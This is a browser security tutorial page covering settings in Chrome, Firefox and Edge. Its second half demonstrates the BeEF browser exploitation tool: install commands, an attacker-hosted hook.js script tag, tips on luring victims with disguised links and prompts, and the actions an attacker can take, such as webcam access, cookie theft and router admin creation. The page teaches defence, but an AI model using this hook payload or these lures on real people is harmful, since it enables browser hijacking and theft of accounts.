Browser security tutorial

<< Prev
Next >>

Introduction

For our security in general and our PC, when browsing the Internet, we need to take care of the security of our browsers.

Depending on the browser used, there are common settings for different actions and settings specific to each browser.


Chrome browser

Chrome, like other browsers, has home page settings, font size, page zoom, search engine used.


Chrome

Within advanced settings, we can set the browser's security level (protection against dangerous sites), we can manage the settings for secure https links and SSL certificates,
we can set the deletion of the data collected by the browser (deleting the browsing history, cookies, cache, and more).


Chrome

It's good to set the security settings to the highest level.


Firefox browser

In the settings menu, the Firefox browser contains local settings and accesses to associated hardware devices (webcam, microphone).


Firefox

There are also advanced settings for blocking pop-ups, javascripts, blocking dangerous downloads.


Firefox

There are other settings for the security of our web surfing.


Firefox

Edge Browser (IE)

And the Edge browser (from Windows 10) has increased its security settings


Edge

You can block pop-ups, add-ons, save passwords, set access to geolocation.


Edge

You can also manage cookies and other navigation session data.


Edge

In conclusion, regardless of the browser used, for our security, we have to consider a few elements:
- browser to be up-to-date.
- validate its automatic update.
- block pop-ups, plug-ins, insecure sites.
- appropriate cookie settings.
- using a serious antivirus up-to-date.


However, no matter how we protect our browser settings, it is not enough. The most important thing is not to click on any button or link, either in the email, the web page or the social networks, unless we are sure what will happen.


XSS Vulnerability of Browsers

This refers to the use and execution of javascripts or other dangerous scripts.
As we have seen in the tutorials, javascripts are widely used in websites, introducing page interactions.These are sent as instructed by the sever, but executed in the client's browser. It is not a solution to block the execution of javascripts in the browser, then the pages appear truncated or missing items.
However, cross-site scripting vulnerabilities (attacks) refer precisely to the execution of a malicious script in the client's browser, as a result of which the attacker gains access to the client's browser, accessing passwords, browsing history, cookies, or sending commands on the webcam, the microphone, the displayed page, the alert messages of the attacked client.
We'll exemplify an attack type using the XSS browser vulnerability, using the BeEF application from Linux.


Pay attention! Do not use this app for real victims. The BeEF tool was designed to test the vulnerabilities of our local network in order to protect us from external attacks.


BeEF (Browser Exploitation Framework)

BeEF is a testing tool for web browser security.
Kali Linux has preinstalled it


Kali

In the case of another Linux distribution, we will install BeEF using the instructions:


#apt-get update
#apt-get install beef-xss


We start the application with the BeEF icon and will open the Terminal:


Beef

Note that in order to access the victim's browser, it will have to run the script:


<script src="http://address_IP_attacker:3000/hook.js"></script>


where IP_attacker is the public IP of the attacker, the port used is 3000, and hook.js is the javascript to be executed in the victim's browser.
The victim can be any user who accesses the attacker's website, which in the section <head>, contains the instruction:


<script src="http://address_IP_attacker:3000/hook.js"></script>


or can be chosen, sending by email or social networking a link to the attacker's javascript. The victim can be fooled, as the visible text of the link can be a reference to a photo or an interesting article.
Once the victim clicks on the sent link, the hook.js script will run in the browser and the attacker's browser will take control of the victim's browser (the victim's browser is hooked).
To make a demonstration in the local network (without attacking any victim), the BeEF application has a demo page, which we visit at:


http://127.0.0.1:3000/demos/butcher/index.html


and which looks like this:


Beef

Click on one of the two buttons on the left and the hook.js script will be executed.
Now the attacker typing in the browser:


http://127.0.0.1:3000/ui/panel


which will open the login window:


Beef

We type "beef" on both the user and the password and log in to the application.


Beef

Click on Online browsers and we have access to the victim's browser.


Beef

In addition to the information about, browser, network, operating system, peripherals, there is the Commands menu, where we can give commands to the victim's browser.


Beef

You can request that the webcam and microphone be turned on in the victim's PC.


Beef

You can start an audio file or a video on the victim's PC.


Beef

Social networking data can be obtained if it is saved in the browser on the victim's PC.


Beef

An Administrator account can be created on the victim's router.


Beef

Even worse, the attacker has access to cookies and a variety of other browser-enabled information that allows the victim's sites and accounts to be accessed on behalf of the attacker.


It is true that after the attacker sends the order, the victim has to give an acceptance (that is a click), but it is not a problem, because the victim's text is customized and may appear as an application update, a warning message or advertisement.


<< Prev
Next >>

Visit my websites:

https://www.jwebsaints.com
https://www.jwebplants.com